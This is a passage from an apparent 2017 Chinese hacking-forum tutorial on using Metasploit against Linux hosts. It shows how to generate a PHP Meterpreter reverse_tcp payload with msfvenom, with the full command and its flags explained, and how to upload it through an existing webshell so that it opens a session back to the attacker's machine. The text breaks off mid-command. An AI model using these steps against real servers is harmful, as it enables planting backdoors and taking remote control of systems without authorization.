本帖最后由 小爱_Joker 于 2017-3-9 13:28 编辑
大晚上的写个文章不容易而且有点小冷
利用metasploit提权Linux主机 主要就是用msf生成一个马子 上传到webshell 打开马子后 你就会发现你的msf已经建立了一个回话 下面进入正题
PHP Meterpreter
metasploit有一个名为PHP Meterpreter的payload,可创建具有meterpreter功能的PHP webshell。
Metasploit的msfVENOM工具可以制作PHP Meterpreter
我们先用msf来生成一个msf php马子
[AppleScript] 纯文本查看 复制代码msfvenom -p php/meterpreter/reverse_tcp LHOST=本机ip -f raw >/root/桌面/test.php
这里我来给各位解释一下
[AppleScript] 纯文本查看 复制代码-p 设置payload
-f 设置输出文件格式
本机ip是在内网中 你的kali主机的ip地址 我们可以通过 ifconfig 命令来查看
2017-02-25 03-45-37屏幕截图.png (183.08 KB, 下载次数: 66)
2017-2-25 03:45 上传
由此可见我在内网中 我本机kali的ip地址是192.168.0.3那么我们来执行
[AppleScript] 纯文本查看 复制代码msfvenom -p php/meterpreter/r